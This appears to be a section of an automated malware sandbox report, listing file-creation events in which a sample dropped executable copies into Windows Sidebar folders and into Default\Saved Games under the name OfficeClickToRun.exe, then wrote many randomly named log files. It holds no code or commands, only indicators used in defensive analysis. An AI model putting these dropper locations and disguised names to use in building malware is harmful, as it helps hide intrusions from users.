Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NlkveJFZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QVwUKkQs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\btCRzSEF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mjqRZCrc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AxYXcbrb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ImrlTNzS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lhRaqYLf.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oMSZXQhy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\TxiAPspM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JmWFnalj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\jFYrMCHr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\EkqWFYHP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bmXzZwPf.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\njEJMHQa.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XNoagVJo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\jZepcAzi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wEdgRRFC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\drzBFnSx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ROyAPbqA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wHQFpXeP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BHGUMQKM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\TMGCsTQL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\tFeWToZU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qSDeLdQE.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\WVQzPKeN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XGbZsHvp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NNotRvLd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\fGerwGnb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DoxmDQeC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xxeWQJRC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\hcChGAko.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\xhSmheyM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\LVVbmwlM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\nXdxeIZI.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\uGVdoafs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oSxqxmWY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\EzneeVJd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aIOINqAk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xYDfcGYs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XIqsTrtm.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kgEiDTmg.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XaxKhNmp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GBZNzENY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wlwnypob.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GrbctlpV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\tLIouJOv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RVLBDpEA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\hlfqcyJu.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mRjyKgxZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\rLgPOzBo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YgrJBoPX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AGiVvpLm.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aMLzISkQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FeLEeCSo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\MXCVunwb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PSpuOONW.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\SYRbALIV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\elMqzDku.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\zNmcoJTF.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\GSwhJpqdkmruXxiphyV.exe	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\rNlQSMnT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oVcWqdBJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GyndizDU.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\zVWvTsuK.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\CVklKbNA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qaPgAreD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\iTpzukdJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JjTtpNNN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bQoBpJni.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\Default\Saved Games\OfficeClickToRun.exe	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lflgjgBQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FuAUYlaa.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\anISgrcX.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\FOzUwYyz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xTpVjUvY.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\iGWxVWoq.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BspVIDPh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ZdSRXoeS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CmCLCTge.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XoYqWopG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RzKbnuOl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QhHtScIC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kdLAuCIK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lSDqlTwz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kAqpsefy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\hkwSIGWM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PYUMpkBx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ktNSFLQh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PUjRdfFC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XKvsXEeS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aQaJCENj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bjaIeUfz.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\sYivqdzV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GYueqmCN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\nMwoFxOX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bCZRjEXC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\fuVIuOJa.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\uaVdMMER.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\uRCnOlqd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PezePGqX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FxxLTNKF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\OcccncZk.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\juaFGjjo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GLflDjTD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BlGuwWUx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CuOMrhud.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\imWxxkPR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\tQGWHnew.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GhHLDCKr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xiXwTpDV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FvgOgdlp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\taBnhvKz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kzHRZmsQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\zWbEFDzT.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\tmQVayIT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\vfCpeOMs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DnOOjYsU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\USABMust.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\iNKhTOoj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\VrxiBoaL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wSKhJewJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IySxBMpl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\yAaeoIJF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\WJARWHgu.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\HejUYCZm.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\XSrHlKtI.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lStYNxlh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\nvPhTzIk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FHqnnVdz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YlzzsoEA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\byyKGwGy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\vtdVTqPJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CoiFKLru.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NZJkwJOG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\LieVinBD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GTPDiSuI.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IrnfaqBK.log	Jump to dropped file

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\dTEysZYC.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\KBRTYUOn.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\zNmcoJTF.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\iGWxVWoq.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\XSrHlKtI.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\xhSmheyM.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\eQfHOZnx.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\MEDBuDSi.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\CVklKbNA.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\tmQVayIT.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\aCjqmULK.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\sYivqdzV.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\juaFGjjo.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\YGvPWYoG.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\HzekDlJr.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\zVWvTsuK.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\hJupzWZv.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\WVQzPKeN.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\FOzUwYyz.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\uaVdMMER.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\jDxFqWCl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\UHOiAYcz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oVcWqdBJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\gsThGkmc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\WJARWHgu.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\LVVbmwlM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CmCLCTge.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lflgjgBQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bwSQzEwi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ROyAPbqA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AGiVvpLm.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qSDeLdQE.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XGbZsHvp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FuAUYlaa.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\uGVdoafs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\cttYUELd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JcGsBzAN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\taBnhvKz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\imWxxkPR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aIOINqAk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PUjRdfFC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GrbctlpV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\LLCKvMGi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\VrxiBoaL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NNotRvLd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DeVdhSGw.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lStYNxlh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bjaIeUfz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RvvRuIkR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\yjTManQC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\hcChGAko.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XoYqWopG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GhHLDCKr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\vtdVTqPJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\elMqzDku.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\TxiAPspM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BlGuwWUx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\jZepcAzi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YlzzsoEA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\HejUYCZm.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\yAaeoIJF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\nMwoFxOX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\edcYVUJp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mxRxOeus.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\UqASurOe.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CdYNaVtP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\rpuWqKyh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ZdSRXoeS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RzKbnuOl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GLflDjTD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xiXwTpDV.log	Jump to dropped file
